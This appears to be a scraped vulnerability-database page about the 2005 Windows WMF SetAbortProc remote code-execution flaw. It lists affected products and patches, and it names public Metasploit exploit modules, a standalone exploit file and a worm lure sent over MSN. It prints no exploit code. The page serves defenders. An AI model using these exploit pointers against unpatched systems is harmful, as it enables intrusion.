   _________________________________________________________________


   This document is also available at

   <http://www.us-cert.gov/cas/techalerts/TA05-362A.html>

   Updates will be made at

   <http://www.kb.cert.org/vuls/id/181038>

   Feedback can be directed to

   <mailto:cert@cert.org?subject=TA05-362A%20Feedback%20VU%23181038>
   _________________________________________________________________

   Produced 2005 by US-CERT, a government organization.

   Terms of use

   <http://www.us-cert.gov/legal.html>

   Revision History

   December 28, 2005: Initial release
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iQEVAwUBQ7M8HX0pj593lg50AQJZLAf8DSIBug0PJwRekEIVO98pEJOQByA6oU63
orYhC7cPDlrFEmIXG5Nx+2sDedb83cUmuGbNTFYKd2FqEzdGty7EsMGIKW6NGyIJ
O0qrS+wOm3T6/9XZ0fwuI0cHJjrlDoF3LlTnfsL4SpEEQRFlDsS/Bd9lxuUHDoU6
0PKOiy2j+XjhpyKlNGA5d7a7Qo+HkKYkO4xMm5NPO5kKYKHW81REcs8mqnMbN0JC
JAoFLSWsCrSVqx8arE2ofwZCtOkCb5iQFlkKsc6EUFzUtYzBS8jaAncYEb1KJatl
w3ACj4+Rr/OsbY1Sqle+P6XKPfIVwjx7s/MgvQR20OVtCbIE92N9nw==
=hAPk
-----END PGP SIGNATURE-----
    

- 漏洞信息

21987
Microsoft Windows Shimgvw.dll SETABORTPROC Function Crafted WMF Arbitrary Code Execution
Local / Remote Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial, Virus / Malware Vendor Verified, Uncoordinated Disclosure, Discovered in the Wild

- 漏洞描述

A code execution flaw exists in Windows. Shimgvw.dll fails to validate WMF files resulting in code execution via the SETABORTPROC function. With a specially crafted file, a context-dependent attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2005-12-27 Unknow
2005-12-27 2006-01-05

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft Windows Graphics Rendering Engine WMF SetAbortProc Code Execution Vulnerability
Design Error 16074
Yes Yes
2005-12-28 12:00:00 2007-11-02 06:36:00
The individual responsible for discovering this issue not currently known.

- 受影响的程序版本

XnView XnView Standard 1.80.3
XnView XnView Minimal 1.80.3
XnView XnView Complete 1.80.3
Wine Windows API Emulator 0.9.4
Wine Windows API Emulator 0.9.3
Wine Windows API Emulator 0.9.2
Wine Windows API Emulator 0.9.1
Wine Windows API Emulator 0.9
Nortel Networks Symposium TAPI Service Provider
Nortel Networks Symposium Agent
Nortel Networks Passport Multiservice Data Manager (MDM)
Nortel Networks Optivity Telephony Manager (OTM)
Nortel Networks Multimedia Communication Platform
Nortel Networks MCS 5200 3.0
Nortel Networks MCS 5100 3.0
Nortel Networks IP Address Domain Manager
Nortel Networks Enterprise Network Management System
Nortel Networks Contact Center Web Client
Nortel Networks Contact Center Multimedia
Nortel Networks Contact Center Manager
Nortel Networks Contact Center Express
Nortel Networks Contact Center
Nortel Networks Communication Control Toolkit 0
Nortel Networks Centrex IP Client Manager
Nortel Networks CallPilot 4.0
Nortel Networks CallPilot 3.0
Nortel Networks CallPilot 2.0
Nortel Networks CallPilot 1.0.7
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows Vista December CTP
Microsoft Windows Vista Beta 1
Microsoft Windows Vista Beta
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6a
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows ME
Microsoft Windows 98SE
Microsoft Windows 98
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
IrfanView IrfanView 3.98
IrfanView IrfanView 3.97
IrfanView IrfanView 3.95
IBM Lotus Notes 6.5.4
IBM Lotus Notes 6.5.3
IBM Lotus Notes 6.5.2
IBM Lotus Notes 6.5.1
IBM Lotus Notes 6.5
Gentoo Linux
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
Avaya Unified Communications Center S3400
Avaya S8100 Media Servers R9
Avaya S8100 Media Servers R8
Avaya S8100 Media Servers R7
Avaya S8100 Media Servers R6
Avaya S8100 Media Servers R12
Avaya S8100 Media Servers R11
Avaya S8100 Media Servers R10
Avaya S8100 Media Servers 0
Avaya Modular Messaging (MAS)
Avaya IP600 Media Servers R9
Avaya IP600 Media Servers R8
Avaya IP600 Media Servers R7
Avaya IP600 Media Servers R6
Avaya IP600 Media Servers R12
Avaya IP600 Media Servers R11
Avaya IP600 Media Servers R10
Avaya IP600 Media Servers
Avaya DefinityOne Media Servers R9
Avaya DefinityOne Media Servers R8
Avaya DefinityOne Media Servers R7
Avaya DefinityOne Media Servers R6
Avaya DefinityOne Media Servers R12
Avaya DefinityOne Media Servers R11
Avaya DefinityOne Media Servers R10
Avaya DefinityOne Media Servers

- 漏洞讨论

Microsoft Windows WMF graphics rendering engine is affected by a remote code-execution vulnerability. This issue affects the 'SetAbortProc' function.

The problem presents itself when a user views a malicious WMF formatted file, triggering the vulnerability when the engine attempts to parse the file.

The issue may be exploited remotely or locally. Any remote code execution that occurs will be with the privileges of the user viewing a malicious image. An attacker may gain SYSTEM privileges if an administrator views the malicious file.

Local code execution may facilitate a complete compromise.

- 漏洞利用

A remote code-execution exploit that triggers this issue is currently circulating in the wild.

An exploit (ie_xp_pfv_metafile.pm revision 1.6) has been released for the Metasploit Framework.

A new exploit (ie_xp_pfv_metafile-19.pm revision 1.9) has been released for the Metasploit Framework. Reports indicate that this exploit can bypass current antivirus and snort signatures.

UPDATE: There are a reports of a worm that is exploiting this vulnerability over MSN. The worm is allegedly enticing users to download a file entitled "xmas-2006 FUNNY.jpg" through links distributed in instant messages. Symantec is currently investigating this. This BID will be updated as more information emerges.

Exploit code wmf_exp.c has been supplied by Unl0ck Research Team. Symantec has not verified the integrity of this exploit.

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

- 解决方案


Please see the referenced advisories for more information:

- Microsoft has released a security advisory (Microsoft Security Advisory (912840)) confirming this issue. The referenced advisory contains information about workarounds; the vendor plans to release updates in the near future.
- Microsoft has released a security advisory (Microsoft Security Bulletin MS06-001) to address this issue for supported operating systems. Reports indicate that users who have disabled Microsoft Windows Picture and Fax Viewer by deregistering 'shimgvw.dll' may have to register it manually after applying fixes released by Microsoft. Please see the Workaround section for instructions on registering 'shimgvw.dll'.
- Avaya has released advisory ASA-2006-001 to identify vulnerable Avaya products. Avaya recommends installing Microsoft fixes to address this issue on affected computers.
- Gentoo Linux has released advisory GLSA 200601-09 to address this issue in Wine. Users of affected packages should execute the following commands with superuser privileges:

emerge --sync
emerge --ask --oneshot --verbose ">=app-emulation/wine-20050930"

- Nortel Networks has released a security advisory to address this issue in various products.
- Microsoft has released patches to address this issue in Microsoft Windows Vista Beta 1 and Windows Vista December CTP (Community Technology Preview). See fixes for the Windows Vista December CTP (Community Technology Preview) patch. Users are advised to contact Microsoft for the Windows Vista Beta 1 patch.
- Gentoo has released advisory GLSA 200601-09:02 to replace fixes that were released as part of the Gentoo advisory 200601-09. The fixes released in the previous advisory did not properly address this issue. Please see the referenced advisory for more information. All Wine users should re-emerge Wine by carrying out the following commands:

emerge --sync
emerge --ask --oneshot --verbose ">=app-emulation/wine-0.9.0"

- Debian has released advisory DSA 954-1 to address this issue in Wine. Please see the referenced advisory for more information.


Microsoft Windows Server 2003 Datacenter Edition SP1

Microsoft Windows XP Media Center Edition SP1

Microsoft Windows XP Tablet PC Edition SP2

Microsoft Windows Server 2003 Standard Edition SP1

Microsoft Windows Server 2003 Standard Edition

Microsoft Windows Server 2003 Enterprise x64 Edition

Microsoft Windows Server 2003 Datacenter Edition Itanium 0

Microsoft Windows Server 2003 Enterprise Edition SP1

Microsoft Windows Vista December CTP

Microsoft Windows Server 2003 Datacenter Edition

Microsoft Windows 2000 Advanced Server SP4

Microsoft Windows XP Home SP1

Microsoft Windows XP Professional x64 Edition

Microsoft Windows Server 2003 Datacenter Edition Itanium SP1

Microsoft Windows Server 2003 Standard x64 Edition

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站